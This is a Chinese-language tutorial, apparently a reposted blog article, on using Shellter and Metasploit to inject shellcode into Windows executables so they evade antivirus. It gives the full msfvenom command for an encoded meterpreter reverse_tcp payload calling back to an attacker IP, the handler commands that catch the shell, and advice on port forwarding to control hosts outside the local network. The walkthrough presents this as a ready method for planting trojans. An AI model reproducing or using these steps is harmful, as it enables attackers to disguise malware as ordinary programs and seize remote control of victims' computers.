后渗透篇:Metasploit shellter免杀

 


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

Metasploit shellter免杀

0x01 Shellter 介绍

0x02 案例演示

0x03 Metasploit&Shellter 捆绑免杀


 

Metasploit shellter免杀

0x01 Shellter 介绍

      Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用程序(仅限于32位应用程序)。shellcode也可以通过Metasploit生成的payload免杀。

      shellter 安装
          apt install shellter

          或

          官网安装https://www.shellterproject.com/download/

后渗透篇:Metasploit shellter免杀_第1张图片

 

 

0x02 案例演示

1. 首先使用unzip解压shellter_v6.9到当前目录,然后进入shellter目录下运行它.

后渗透篇:Metasploit shellter免杀_第2张图片

2. 进入shellter的炫酷界面了,这里选择A;

A代表自动模式,PE target是进行免杀的exe预注入文件路径,程序会被自动备份到shellter_backup文件夹下,防止文件被破坏.

后渗透篇:Metasploit shellter免杀_第3张图片

3. 这里提示是否使用隐身模式,选择Y,这里提示选择列出的payload还是自定义,我们选择L,输入1选择第一个payload,然后设置回连IP和回连端口

后渗透篇:Metasploit shellter免杀_第4张图片

后渗透篇:Metasploit shellter免杀_第5张图片

4. 这时开启监听,然后将木马复制到物理机上测试即可

后渗透篇:Metasploit shellter免杀_第6张图片

注:这种攻击方法只适用于内网,如果想要控制外网的主机,还要在路由器上配置端口转发。

 

0x03 Metasploit&Shellter 捆绑免杀

1. 使用Metasploit生成 payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw

2. 然后就是使用Shellter选择捆绑exe文件

后渗透篇:Metasploit shellter免杀_第7张图片

3. 把 fud.raw 注入到exe程序

后渗透篇:Metasploit shellter免杀_第8张图片

4. 启动Metasploit监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1337
exploit

参考链接:

              https://www.heibai.org/post/462.html

              https://blog.csdn.net/sufeiboy/article/details/65939342  

 


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


 

你可能感兴趣的:(渗透测试,后渗透篇,免杀篇)